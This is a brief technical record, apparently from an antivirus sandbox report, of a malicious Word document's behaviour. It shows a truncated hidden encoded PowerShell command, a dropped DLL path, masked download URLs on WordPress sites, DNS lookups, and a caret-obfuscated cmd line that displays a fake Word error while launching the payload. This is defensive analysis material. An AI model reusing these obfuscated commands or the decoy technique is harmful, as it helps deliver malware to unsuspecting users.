Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD cwB2ACAAKAAnAEwAJwArACcARwA3AHYAJwApACAAIAAoAFsAdAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiAC0AZgAnAHMAeQAnACwAJwBPAC4AZABpACcALAAnAHMAVABlAE0A...
- %HOMEPATH%\bs_c8n2\vn9sgd5\d68s.dll
- %HOMEPATH%\bs_c8n2\vn9sgd5\d68s.dll
- %HOMEPATH%\bs_c8n2\vn9sgd5\d68s.dll
- http://av##pr.com/wp-includes/hJ/
- http://www.su####canada.xyz/wp-content/0sDDTy/
- DNS ASK av##pr.com
- DNS ASK ul#####esoftwarenet.com
- DNS ASK su#####arhmirror.com
- DNS ASK ca##da.com
- DNS ASK hi###gym.com
- DNS ASK yu###maku.com
- DNS ASK su####canada.xyz
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD cwB2ACAAKAAnAEwAJwArACcARwA3AHYAJwApACAAIAAoAFsAdAB5AFAAZ...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.